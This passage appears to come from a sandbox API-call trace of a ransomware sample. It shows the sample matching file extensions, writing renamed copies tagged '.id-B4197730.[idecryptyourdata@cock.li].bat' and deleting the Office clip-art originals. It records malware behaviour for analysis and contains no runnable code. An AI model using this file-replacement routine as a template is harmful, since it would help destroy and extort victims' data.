returned 63 [0064.365] lstrlenW (lpString=".zip") returned 4 [0064.365] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.365] lstrlenW (lpString=".rar") returned 4 [0064.365] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.365] lstrlenW (lpString=".bz2") returned 4 [0064.365] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.365] lstrlenW (lpString=".7z") returned 3 [0064.365] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.365] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF") returned 63 [0064.365] lstrlenW (lpString=".dbf") returned 4 [0064.365] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.365] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF") returned 63 [0064.365] lstrlenW (lpString=".1cd") returned 4 [0064.365] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.365] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF") returned 63 [0064.365] lstrlenW (lpString=".jpg") returned 4 [0064.365] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.366] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.366] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.366] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cupinst.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0064.366] GetLastError () returned 0x0 [0064.366] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x2856, lpOverlapped=0x0) returned 1 [0064.367] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x2860, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x2860, lpOverlapped=0x0) returned 1 [0064.368] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.368] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xea, lpOverlapped=0x0) returned 1 [0064.368] SetEndOfFile (hFile=0x384) returned 1 [0064.368] CloseHandle (hObject=0x384) returned 1 [0064.369] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.369] SetEndOfFile (hFile=0x388) returned 1 [0064.370] CloseHandle (hObject=0x388) returned 1 [0064.370] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.370] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cupinst.wmf")) returned 1 [0064.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 67 [0064.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 67 [0064.371] lstrlenW (lpString=".doc") returned 4 [0064.371] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.371] lstrlenW (lpString=".docx") returned 5 [0064.371] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0064.371] lstrlenW (lpString=".pdf") returned 4 [0064.371] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.371] lstrlenW (lpString=".xls") returned 4 [0064.371] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.371] lstrlenW (lpString=".xlsx") returned 5 [0064.371] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0064.371] lstrlenW (lpString=".ppt") returned 4 [0064.371] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 67 [0064.371] lstrlenW (lpString=".zip") returned 4 [0064.371] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.371] lstrlenW (lpString=".rar") returned 4 [0064.371] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.371] lstrlenW (lpString=".bz2") returned 4 [0064.371] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.371] lstrlenW (lpString=".7z") returned 3 [0064.371] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 67 [0064.371] lstrlenW (lpString=".dbf") returned 4 [0064.371] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 67 [0064.371] lstrlenW (lpString=".1cd") returned 4 [0064.371] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 67 [0064.371] lstrlenW (lpString=".jpg") returned 4 [0064.371] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.372] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.372] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.372] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00117_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0064.372] GetLastError () returned 0x0 [0064.372] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x7992, lpOverlapped=0x0) returned 1 [0064.907] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x79a0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x79a0, lpOverlapped=0x0) returned 1 [0064.933] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.933] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.933] SetEndOfFile (hFile=0x384) returned 1 [0064.933] CloseHandle (hObject=0x384) returned 1 [0064.935] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.935] SetEndOfFile (hFile=0x388) returned 1 [0064.936] CloseHandle (hObject=0x388) returned 1 [0064.936] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.936] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00117_.wmf")) returned 1 [0064.937] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 68 [0064.937] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 68 [0064.937] lstrlenW (lpString=".doc") returned 4 [0064.937] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.937] lstrlenW (lpString=".docx") returned 5 [0064.937] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.937] lstrlenW (lpString=".pdf") returned 4 [0064.937] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.937] lstrlenW (lpString=".xls") returned 4 [0064.937] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.937] lstrlenW (lpString=".xlsx") returned 5 [0064.937] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.937] lstrlenW (lpString=".ppt") returned 4 [0064.937] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.937] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 68 [0064.937] lstrlenW (lpString=".zip") returned 4 [0064.937] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.937] lstrlenW (lpString=".rar") returned 4 [0064.937] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.937] lstrlenW (lpString=".bz2") returned 4 [0064.937] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.937] lstrlenW (lpString=".7z") returned 3 [0064.937] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.938] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 68 [0064.938] lstrlenW (lpString=".dbf") returned 4 [0064.938] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.938] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 68 [0064.938] lstrlenW (lpString=".1cd") returned 4 [0064.938] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.938] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 68 [0064.938] lstrlenW (lpString=".jpg") returned 4 [0064.938] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.938] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.938] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.938] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01152_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0064.939] GetLastError () returned 0x0 [0064.939] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0xb90, lpOverlapped=0x0) returned 1 [0064.961] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xba0, lpOverlapped=0x0) returned 1 [0064.962] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.962] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.962] SetEndOfFile (hFile=0x384) returned 1 [0064.962] CloseHandle (hObject=0x384) returned 1 [0064.962] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.963] SetEndOfFile (hFile=0x388) returned 1 [0064.963] CloseHandle (hObject=0x388) returned 1 [0064.963] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.964] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01152_.wmf")) returned 1 [0064.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 68 [0064.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 68 [0064.964] lstrlenW (lpString=".doc") returned 4 [0064.964] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.964] lstrlenW (lpString=".docx") returned 5 [0064.964] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.964] lstrlenW (lpString=".pdf") returned 4 [0064.964] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.964] lstrlenW (lpString=".xls") returned 4 [0064.964] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.964] lstrlenW (lpString=".xlsx") returned 5 [0064.964] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.964] lstrlenW (lpString=".ppt") returned 4 [0064.964] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 68 [0064.965] lstrlenW (lpString=".zip") returned 4 [0064.965] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.965] lstrlenW (lpString=".rar") returned 4 [0064.965] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.965] lstrlenW (lpString=".bz2") returned 4 [0064.965] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.965] lstrlenW (lpString=".7z") returned 3 [0064.965] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 68 [0064.965] lstrlenW (lpString=".dbf") returned 4 [0064.965] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 68 [0064.965] lstrlenW (lpString=".1cd") returned 4 [0064.965] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 68 [0064.965] lstrlenW (lpString=".jpg") returned 4 [0064.965] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.965] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.965] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.965] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01162_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0064.966] GetLastError () returned 0x0 [0064.966] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x8fc, lpOverlapped=0x0) returned 1 [0064.996] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x900, lpOverlapped=0x0) returned 1 [0064.997] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.997] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.997] SetEndOfFile (hFile=0x384) returned 1 [0064.997] CloseHandle (hObject=0x384) returned 1 [0064.998] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.998] SetEndOfFile (hFile=0x388) returned 1 [0064.999] CloseHandle (hObject=0x388) returned 1 [0065.000] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.000] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01162_.wmf")) returned 1 [0065.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 68 [0065.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 68 [0065.001] lstrlenW (lpString=".doc") returned 4 [0065.001] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.001] lstrlenW (lpString=".docx") returned 5 [0065.001] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.001] lstrlenW (lpString=".pdf") returned 4 [0065.001] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.001] lstrlenW (lpString=".xls") returned 4 [0065.001] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.001] lstrlenW (lpString=".xlsx") returned 5 [0065.001] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.001] lstrlenW (lpString=".ppt") returned 4 [0065.001] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 68 [0065.001] lstrlenW (lpString=".zip") returned 4 [0065.001] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.001] lstrlenW (lpString=".rar") returned 4 [0065.001] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.001] lstrlenW (lpString=".bz2") returned 4 [0065.001] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.001] lstrlenW (lpString=".7z") returned 3 [0065.001] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 68 [0065.001] lstrlenW (lpString=".dbf") returned 4 [0065.001] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 68 [0065.002] lstrlenW (lpString=".1cd") returned 4 [0065.002] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 68 [0065.002] lstrlenW (lpString=".jpg") returned 4 [0065.002] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.002] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.002] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.002] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01166_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01166_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0065.003] GetLastError () returned 0x0 [0065.003] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x820, lpOverlapped=0x0) returned 1 [0065.075] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x830, lpOverlapped=0x0) returned 1 [0065.075] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.075] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.075] SetEndOfFile (hFile=0x384) returned 1 [0065.076] CloseHandle (hObject=0x384) returned 1 [0065.076] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.076] SetEndOfFile (hFile=0x388) returned 1 [0065.077] CloseHandle (hObject=0x388) returned 1 [0065.077] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01166_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.078] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01166_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01166_.wmf")) returned 1 [0065.078] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 68 [0065.078] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 68 [0065.078] lstrlenW (lpString=".doc") returned 4 [0065.078] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.078] lstrlenW (lpString=".docx") returned 5 [0065.078] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.078] lstrlenW (lpString=".pdf") returned 4 [0065.078] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.078] lstrlenW (lpString=".xls") returned 4 [0065.078] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.078] lstrlenW (lpString=".xlsx") returned 5 [0065.078] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.078] lstrlenW (lpString=".ppt") returned 4 [0065.078] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.078] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 68 [0065.078] lstrlenW (lpString=".zip") returned 4 [0065.078] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.078] lstrlenW (lpString=".rar") returned 4 [0065.078] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.078] lstrlenW (lpString=".bz2") returned 4 [0065.078] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.078] lstrlenW (lpString=".7z") returned 3 [0065.078] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 68 [0065.079] lstrlenW (lpString=".dbf") returned 4 [0065.079] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 68 [0065.079] lstrlenW (lpString=".1cd") returned 4 [0065.079] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 68 [0065.079] lstrlenW (lpString=".jpg") returned 4 [0065.079] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.079] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.079] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.079] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01167_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01167_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0065.079] GetLastError () returned 0x0 [0065.080] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x820, 